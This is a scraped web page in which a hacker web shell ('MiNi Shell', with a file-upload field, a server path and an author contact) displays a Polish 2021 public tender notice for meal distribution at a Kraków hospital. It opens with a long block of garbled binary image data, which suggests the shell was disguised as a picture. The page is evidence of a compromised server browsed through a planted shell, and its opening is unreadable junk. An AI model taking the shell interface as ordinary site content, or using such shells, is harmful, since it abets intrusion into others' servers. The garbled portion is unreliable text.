JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210617/0008616901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00086169 z dnia 2021-06-17</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi dystrybucji posiłków na oddziały szpitalne do kuchenek oddziałowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Kliniczny im. dr. J. Babińskiego SPZOZ w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000298554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">dr. Józefa Babińskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-393</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">anna.wilk@babinski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.babinski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi dystrybucji posiłków na oddziały szpitalne do kuchenek oddziałowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d39d5611-ce93-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00086169</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000371/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Świadczenie usługi dystrybucji posiłków na oddziały szpitalne do kuchenek oddziałowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpital_babinski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej<br/>zapośrednictwemplatformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski. Zamawiający informuje, że instrukcja korzystania z Platformy Zakupowej dotycząca w szczególności<br/>logowania, pobrania dokumentacji, składania wniosków o wyjaśnienia treści SWZ, składania ofert, oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy Zakupowej znajduje się w zakładce Instrukcje dla Wykonawcy na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-23/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem postępowania jest udzielenie zamówienia w zakresie świadczenia przez Wykonawcę na rzecz Zamawiającego usługi polegającej na dystrybucji posiłków z budynku kuchni szpitalnej do kuchenek oddziałowych mieszczących się w poszczególnych oddziałach szpitalnych. <br/>2. Usługa świadczona będzie w siedzibie Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie przy ul. dr. J. Babińskiego 29, do 21 kuchenek oddziałowych zlokalizowanych w 16 budynkach (zgodnie z załącznikiem „A” do SWZ stanowiącym mapę terenu z naniesioną lokalizacją budynków szpitalnych (na czerwono), w których są zlokalizowane oddziały szpitalne (kuchenki oddziałowe) i wskazaniem kondygnacji na której w poszczególnych budynkach znajdują się kuchenki oddziałowe – załącznik „B” do SWZ).<br/>3. Wykonawca zapewni ciągłość i terminowość realizacji usługi przez cały okres trwania umowy. Żadne okoliczności nie mogą być przyczyną nagłego zaprzestania bądź ograniczenia świadczenia usługi.<br/>4. Wykonawca w ramach usługi:<br/>a) zapewni odpowiedni środek transportu (lub środki transportu) do przewożenia:<br/>- termosów i pojemników transportowych z posiłkami oraz po posiłkach (pustych),<br/>- wody pitnej, <br/>- pojemników na odpady pokonsumpcyjne (pustych) oraz pojemników z odpadami pokonsumpcyjnymi;<br/>b) zapewni obsługę dystrybucyjną w postaci osób skierowanych do świadczenia usługi, w tym: <br/>- osobę kierowcy lub kierowców,<br/>- osobę pomocnika lub pomocników (osób wykonujących czynności wskazane w ust. 5);<br/>5. Usługa realizowana będzie codziennie od 01.08.2021r. do 31.07.2024r., w ilości 10 godzin zegarowych dziennie, w godzinach od 5:30 do 15:30, według poniższego planu:<br/>a) dystrybucja posiłków na śniadanie: <br/>- odbiór i wyniesienie z budynku kuchni szpitalnej i załadunek do środka transportu termosów i pojemników transportowych z posiłkami oraz pojemników na odpady pokonsumpcyjne – godz. 5:30 – 6:30,<br/>- wyładunek i wniesienie do poszczególnych kuchenek oddziałowych termosów i pojemników transportowych z posiłkami oraz pojemników na odpady pokonsumpcyjne – godz. 6:30 – 8:00,<br/>b) dystrybucja wody pitnej:<br/>- odbiór i wyniesienie z budynku kuchni szpitalnej i załadunek do środka transportu wody pitnej, a następnie jej wyładunek i wniesienie do poszczególnych kuchenek oddziałowych – godz. 8:00 – 9:30,<br/>c) dystrybucja posiłków na obiad: <br/>- odbiór i wyniesienie z budynku kuchni szpitalnej oraz załadunek do środka transportu termosów i pojemników transportowych z posiłkami - godz. 9:30 – 10:45,<br/>- wyładunek i wniesienie do poszczególnych kuchenek oddziałowych termosów i pojemników transportowych z posiłkami - godz. 10:45 – 12:45,<br/>d) dystrybucja posiłków na kolację:<br/>- odbiór i wyniesienie z budynku kuchni szpitalnej, załadunek do środka transportu termosów i pojemników transportowych z posiłkami oraz ich wyładunek i wniesienie do poszczególnych kuchenek oddziałowych - godz. 14:00 – 15:00.<br/>e) odbiór brudnych termosów i pojemników transportowych po posiłkach oraz pojemników z odpadami pokonsumpcyjnymi z poszczególnych kuchenek oddziałowych oraz przewiezienie ich i wniesienie do budynku kuchni szpitalnej – w godz. 12:45 – 14:00, 15:00 – 15:30 oraz w miarę zgłoszonych potrzeb w tym zakresie.<br/>6. Zamawiający zastrzega sobie prawo do jednostronnego, bieżącego ustalania kolejności dostarczania posiłków do poszczególnych kuchenek oddziałowych oraz do zmiany wskazanych w ust. 5 godzin świadczenia usługi i planu. Zmiany, o których mowa w zdaniu poprzednim, nie wymagają zawarcia aneksu do umowy oraz będą następowały na podstawie pisemnej informacji Zamawiającego.<br/>7. Wykonawca realizował będzie usługę zgodnie z obowiązującymi przepisami i wymogami, w tym: higienicznymi, sanitarnymi, BHP oraz innymi obowiązującymi przepisami prawa, gwarantując bezpieczeństwo dystrybucji posiłków. <br/>8. Wykonawca realizował będzie usługę zgodnie z wymaganiami Zamawiającego określonymi szczegółowo w załączniku nr 4 do SWZ – wzorze umowy.<br/>9. W celu właściwej realizacji usługi Wykonawca zapewni odpowiednią liczbę środków transportu do świadczenia usługi. Powierzchnia załadunku środka transportu będzie wynosić minimum 7m², ale nie więcej niż 12m², gwarantując niezbyt duże piętrowanie termosów i pojemników transportowych oraz swobodny przejazd wewnętrznymi drogami kompleksu szpitalnego.<br/>W sytuacji zaproponowania przez Wykonawcę realizacji przedmiotu zamówienia jednym środkiem transportu Zamawiający informuje, że ze względu na dużą ilość termosów i pojemników transportowych, dystrybucja posiłków w ramach pojedynczego śniadania, obiadu czy kolacji odbywać się będzie w dwóch turach. W przypadku zaproponowania przez Wykonawcę realizacji przedmiotu zamówienia więcej niż jednym środkiem transportu sytuacja opisana w zdaniu pierwszym nie będzie miała miejsca.<br/>10. Osoby skierowane do świadczenia usługi będą posiadać: ważne orzeczenie lekarskie do celów sanitarno-epidemiologicznych stwierdzające zdolność do podjęcia/wykonywania prac oraz ważny dokument potwierdzający wykonanie badań lekarskich na nosicielstwo drobnoustrojów chorobotwórczych z wynikiem ujemnym wraz z podaniem stacji sanitarno-epidemiologicznej, w której dokonano badania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek - Zdolność techniczna lub zawodowa:<br/>W celu spełnienia warunku Wykonawca wykaże, że wykonał, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, jedną usługę zrealizowaną lub realizowaną przez okres sześciu miesięcy na kwotę minimum 50 000 zł brutto, polegającą na dystrybucji posiłków w zakresie tożsamym z przedmiotem niniejszego zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest wnieść wadium. Każda składana oferta musi być zabezpieczona wadium w wysokości 9 000,00 zł (słownie: dziewięć tysięcy złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert, tj. przed godz. 09:00 w dniu 02.07.2021r. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności i mogą być dopuszczalne tylko w granicach wskazanych w art. 454 i 455 ustawy - Prawo zamówień publicznych.<br/>2.	Strony przez istotne zmiany postanowień umowy w stosunku do treści złożonej w postępowaniu oferty rozumieją takie zmiany, które wskazane zostały w art. 455 ustawy – Prawo zamówień publicznych.<br/>3.	Wszelkie zmiany postanowień umowy w stosunku do treści złożonej w postępowaniu oferty, inne niż zmiany wskazane w ust. 1 i 2, nie mają charakteru zmian istotnych. Zamawiający dopuszcza ponadto zmiany niniejszej umowy w zakresie: <br/>a)	§ 1 ust. 2 – ilości kuchenek szpitalnych i ilości budynków; <br/>b)	§ 1 ust. 5 – godzin określonych w planie dystrybucji; <br/>c)	§ 3 ust. 2 – liczby, marki i numeru rejestracyjnego środka transportu; <br/>d)	§ 5 – wskazanych osób; pod warunkiem, że na zmiany powyższe Zamawiający wyrazi zgodę.<br/>4. Wynagrodzenie Wykonawcy, o którym mowa w § 4 ust. 3, będzie waloryzowane w trakcie obowiązywania umowy w przypadku: <br/>a)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, przy czym warunkiem dokonania waloryzacji będzie skierowanie do Zamawiającego pisemnego wniosku Wykonawcy zawierającego uzasadnienie i szczegółowy sposób wyliczenia nowych cen oraz wpływ zmiany na wynagrodzenie Wykonawcy z zastrzeżeniem, że waloryzacja wynagrodzenia będzie mogła nastąpić po upływie miesiąca od dnia wprowadzenia nowej kwoty minimalnego wynagrodzenia za pracę. W przypadku, o którym mowa w niniejszym punkcie wartość wynagrodzenia brutto wskazana w § 4 ust. 2-3 ulegnie zmianie o wartość całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących niniejszą umowę, do wysokości aktualnie obowiązującego minimalnego wynagrodzenia za pracę lub aktualnie obowiązującej minimalnej stawki godzinowej, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia za pracę lub minimalnej stawki godzinowej. <br/>b)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu, lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, przy czym warunkiem dokonania waloryzacji będzie skierowanie do Zamawiającego pisemnego wniosku Wnioskodawcy zawierającego uzasadnienie i szczegółowy sposób wyliczenia nowych cen oraz wpływ zmian na wynagrodzenie Wykonawcy z zastrzeżeniem, że waloryzacja wynagrodzenia będzie mogła nastąpić po upływie miesiąca od dnia wprowadzenia powyższych zmian w zakresie ubezpieczenia społecznego lub zdrowotnego w przypadku, o którym mowa w niniejszym punkcie, wartość wynagrodzenia brutto wskazana w § 4 ust. 2-3, ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on dodatkowo zobowiązany ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio uczestniczących w imieniu Wykonawcy w realizacji niniejszej umowy. <br/>c)	zmiany stawki podatku od towarów i usług, przy czym warunkiem dokonania waloryzacji będzie skierowanie do Zamawiającego pisemnego wniosku Wykonawcy zawierającego uzasadnienie i szczegółowy sposób wyliczenia nowych cen z zastrzeżeniem, że waloryzacja będzie mogła nastąpić po upływie miesiąca od dnia wprowadzenia nowych stawek podatku od towarów i usług. W przypadku, o którym mowa w niniejszym punkcie wartość wynagrodzenia netto Wykonawcy nie zmieni się, a określona w aneksie wartość wynagrodzenia brutto wskazana w § 4 ust. 2-3 zostanie wyliczona na podstawie nowych przepisów. <br/>5. Zmiana wynagrodzenia wskutek okoliczności, o których mowa w ust. 4, będzie miała zastosowanie wyłącznie do tej części zamówienia, która nie została jeszcze zrealizowana. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-02 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ponad dokumenty i oświadczenia określone powyżej w ogłoszeniu, Wykonawca składa: Załącznik nr 1 do SWZ - Formularz ofertowy Wykonawcy; Załącznik nr 2A do SWZ - Oświadczenie dotyczące spełniania warunków udziału w postępowaniu – Wykaz usług; Załącznik nr 3 do SWZ -	Oświadczenie o zobowiązaniu podmiotu oddającego do dyspozycji Wykonawcy niezbędne zasoby na potrzeby realizacji zamówienia (jeżeli dotyczy)</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-17 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com